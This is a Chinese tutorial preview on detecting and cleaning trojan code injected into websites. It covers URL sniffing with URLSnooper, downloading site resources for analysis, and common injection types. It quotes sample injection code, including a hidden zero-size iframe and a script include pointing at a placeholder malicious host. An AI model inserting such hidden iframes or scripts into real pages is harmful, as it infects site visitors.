"网站挂马检测与清除" 网站挂马是一种常见的网络攻击方式,指的是攻击者在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码。用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。 检测挂马可以使用urlsnooper软件,该软件可以嗅探URL,检测网站中的恶意代码。首先需要安装urlsnooper软件,然后在“ProtocolFilter”中选择“ShowAll”,然后单击“SniffNetwork”按钮开始监听网络。接着使用IE浏览器打开需要进行检测木马的网站,urlsnooper会自动抓取网站中的所有连接。在侦测结果中可能包含的连接地址非常多,这个时候就需要进行排查,可以选中每一个记录,urlsnooper会在下方中显示详细的监听结果。如果发现存在恶意代码,可以使用网络搜索引擎来搜索该代码,了解该代码的描述和解决方法等。 在检测到恶意代码后,可以使用Flashget的资源管理器来获取该网站的内容,下载该网站的一些资源,然后进行查看和分析。通过对恶意代码的分析,可以知道攻击者是采用哪个漏洞,还可以获取0day。 常见的挂马代码有框架嵌入式网络挂马、Js调用型网页挂马和图片伪装挂马等。框架嵌入式网络挂马是最早也是最有效的一种网络挂马技术,通常的挂马代码如下: ``` <iframe src="http://www.xxx.com/muma.html" width="0" height="0" frameborder="0" scrolling="no"></iframe> ``` Js调用型网页挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,通常的挂马代码如下: ``` http://www.xxx.com/gm.js ``` 图片伪装挂马是随着防毒技术的发展,黑手段也在不断变化和改进的新的挂马技术。 因此,进行网站挂马检测与清除非常重要,可以使用urlsnooper软件和Flashget资源管理器等工具来检测和清除恶意代码,保护网站的安全。同时,也需要了解常见的挂马代码,了解攻击者的攻击方式和手段,提高网站的安全性。
剩余22页未读,继续阅读
- 粉丝: 0
- 资源: 7
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助